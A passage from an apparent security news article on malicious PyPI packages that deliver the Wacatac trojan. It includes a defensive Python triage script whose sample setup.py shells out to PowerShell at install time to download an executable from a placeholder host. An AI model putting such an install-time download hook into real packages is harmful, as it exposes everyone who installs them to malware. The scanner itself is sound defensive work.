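    """Return (module, attr) for `mod.attr(...)` or an imported bare name."""
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        base = aliases.get(func.value.id)
        if base and base[1] is None:
            return (base[0], func.attr)
    elif isinstance(func, ast.Name):
        base = aliases.get(func.id)
        if base and base[1] is not None:
            return base
    return None


def _strings(node):
    return [n.value for n in ast.walk(node)
            if isinstance(n, ast.Constant) and isinstance(n.value, str)]


def triage_setup_py(source: str):
    """Return [(lineno, 'module.attr', [matched tokens])] for exec-style calls."""
    tree = ast.parse(source)
    aliases = _import_aliases(tree)
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        target = _resolve(node.func, aliases)
        if target in EXEC_CALLS:
            text = " ".join(_strings(node)).lower()
            tokens = [t for t in SUSPICIOUS_TOKENS if t in text]
            findings.append((node.lineno, ".".join(target), tokens))
    return findings


# Constructed sample in the shape the article describes: a setup.py that shells
# out to PowerShell to fetch a binary. The URL and package name are placeholders.
SAMPLE_SETUP_PY = '''\
from setuptools import setup
import subprocess

# install-time download of a binary, run before setup() is even reached
subprocess.run(["powershell", "-c",
    "Invoke-WebRequest -Uri https://placeholder.invalid/Oxyz.exe -OutFile Oxyz.exe"])

setup(name="examplelib", version="0.0.1", description="A handy helper library")
'''

if __name__ == "__main__":
    for lineno, call, tokens in triage_setup_py(SAMPLE_SETUP_PY):
        print(f"line {lineno}: {call}() mentions {tokens}")
```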

Wacatac can also be used to deploy additional malware on the victim’s machine, including ransomware, and perform other “actions of a malicious hacker’s choice”, according to Microsoft.

“Python end users should always perform due diligence before downloading and running any packages, especially from new authors. And as can be seen, publishing more than one package in a short time period is no indication that an author is reliable,” Fortinet concludes.

Related: PyPI Users Targeted With PoweRAT Malware

Related: Malicious PyPI Module Poses as SentinelOne SDK

Related: Python, JavaScript Developers Targeted With Fake Packages Delivering Ransomware

Related: Security Firms Find Over 20 Malicious PyPI Packages Designed for Data Theft

Ionut Arghire is an international correspondent for SecurityWeek.


https://www.securityweek.com/pypi-users-targeted-wacatac-trojan-new-supply-chain-attack